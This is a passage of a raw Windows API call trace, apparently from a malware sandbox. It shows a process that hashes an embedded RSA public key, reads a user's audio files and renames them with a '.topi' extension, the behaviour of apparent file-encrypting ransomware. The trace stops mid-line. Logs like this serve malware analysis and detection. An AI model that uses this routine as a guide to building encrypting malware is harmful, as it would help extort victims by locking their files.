[0099.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.043] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.043] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x163fc, lpOverlapped=0x0) returned 1 [0099.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0099.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.044] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.045] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.045] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.045] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.045] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.045] GetLastError () returned 0x0 [0099.045] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.045] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.045] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.045] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.045] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16400) returned 0x9a06a00 [0099.046] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc028 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51b0 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc070 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51f8 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.046] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.046] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5210 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e51f8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e51f8 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.047] GetCurrentThreadId () returned 0x8c4 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fb030 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.048] GetCurrentThreadId () returned 0x8c4 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51f8 [0099.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0099.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.052] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.052] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hv92hUyERA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\hv92huyera.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\Hv92hUyERA.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\hv92huyera.wav.topi")) returned 1 [0099.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.053] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.054] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b2cbcf0, ftCreationTime.dwHighDateTime=0x1d5ba2c, ftLastAccessTime.dwLowDateTime=0xf4d21e90, ftLastAccessTime.dwHighDateTime=0x1d5bf8e, ftLastWriteTime.dwLowDateTime=0xf4d21e90, ftLastWriteTime.dwHighDateTime=0x1d5bf8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M-LwTSoe", cAlternateFileName="")) returned 1 [0099.054] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\YVnKQ.mp3") returned=".mp3" [0099.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\qiN1EL4yYUSIfbrJyDb6\\YVnKQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\qin1el4yyusifbrjydb6\\yvnkq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.055] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=28536) returned 1 [0099.055] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.058] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6f52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.058] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.059] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.060] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.060] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.060] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.060] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.060] GetLastError () returned 0x0 [0099.060] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.060] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.060] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.061] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.061] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6f80) returned 0x9a06a00 [0099.061] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc070 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51c8 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc0b8 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e51e0 [0099.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5210 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5228 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.062] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5228 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5228 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5210 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5228 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5210 | out: hHeap=0x680000) returned 1 [0099.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.063] GetCurrentThreadId () returned 0x8c4 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fb0c0 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.063] GetCurrentThreadId () returned 0x8c4 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 